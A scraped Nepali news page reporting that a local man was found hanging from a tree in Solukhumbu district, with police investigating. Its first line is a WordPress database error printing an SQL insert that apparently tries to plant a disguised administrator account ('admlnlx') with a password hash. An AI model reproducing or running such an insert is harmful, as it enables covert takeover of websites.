WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$Bw0gAybRU6Gc.UaQagkSotwO6RR.Ww.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-05 02:42:17', '', 'admlnlx', 'admlnlx')
काठमाण्डौ । सोलुखुम्बु जिल्लाको नेचासल्यान गाउँपालिका वडा नं-३ स्थित बरडांँडामा एक पुरुष झुण्डिएको अवस्थामा फेला परेका छन् । रुखमा झुण्डिएको अवस्थामा फेला परेका अन्दाजी ४५ बर्षीय पुरुष भीमराज राउत स्थानिय भएको बताइएको छ।
राउत आज बिहान ४ बजे घरबाट निस्किएका उनका परिवारले जनाए । घरबाट निस्किएको केहि बेरमै बरको रुखमा झुण्डिएको अवस्थामा भेटिएको स्थानीयले बताए।
घटनाको अनुसन्धानका लागि प्रहरी निरीक्षकको नेतृत्वमा एउटा टोली घटनास्थल पठाइएको जिल्ला प्रहरीले जानकारी दिए।प्रहरी टोलि पुगेर अध्ययन गरेपछि घटनाको बिस्तृत आउने प्रहरीको भनाइ छ।